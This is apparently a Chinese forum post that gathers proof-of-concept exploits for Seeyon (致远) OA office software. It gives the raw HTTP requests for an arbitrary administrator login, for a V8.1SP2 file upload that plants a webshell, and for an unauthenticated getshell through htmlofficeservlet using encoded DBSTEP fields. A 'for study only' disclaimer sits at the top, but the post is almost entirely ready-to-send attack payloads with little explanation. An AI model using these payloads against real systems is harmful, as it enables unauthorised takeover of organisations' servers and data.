致远漏洞 PoC 整理
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!致远 OA 任意管理员登录
POST /seeyon/thirdpartyController.do HTTP/1.1
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
致远 OA_V8.1SP2 文件上传漏洞
POST /seeyou/ajax.do?method=ajaxAction&managerName=formulaManager&managerMethod=saveFormula4C1oud HTTP/1.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Cozilla/5.0 (Vindows Et 6.1; Sow64,rident/7.0; ry:11.0)
Accept-Encoding: gzip,deflate
Cookie:JSESSIONID=5bGx5rW35LmL5YWz
Cache-Control: no-cache
Content-Encoding: deflate
Pragma: no-cache
Host: 1.1.1.1
Accept: text/html,image/gif, image/jpeg,*; q=.2,*/*; q=.2
Content-Length:522729
Connection: close
X-Forwarded-For: 1.2.3.4
arguments={"formulaName":"test","formulaAlias":"safe_pre","formulaType":"2","formulaExpression":"","sample":"马子"}
致远 OA 协同管理软件无需登录 GetShell
ip/seeyon/htmlofficeservlet
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2
dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
webshell
页:
[1]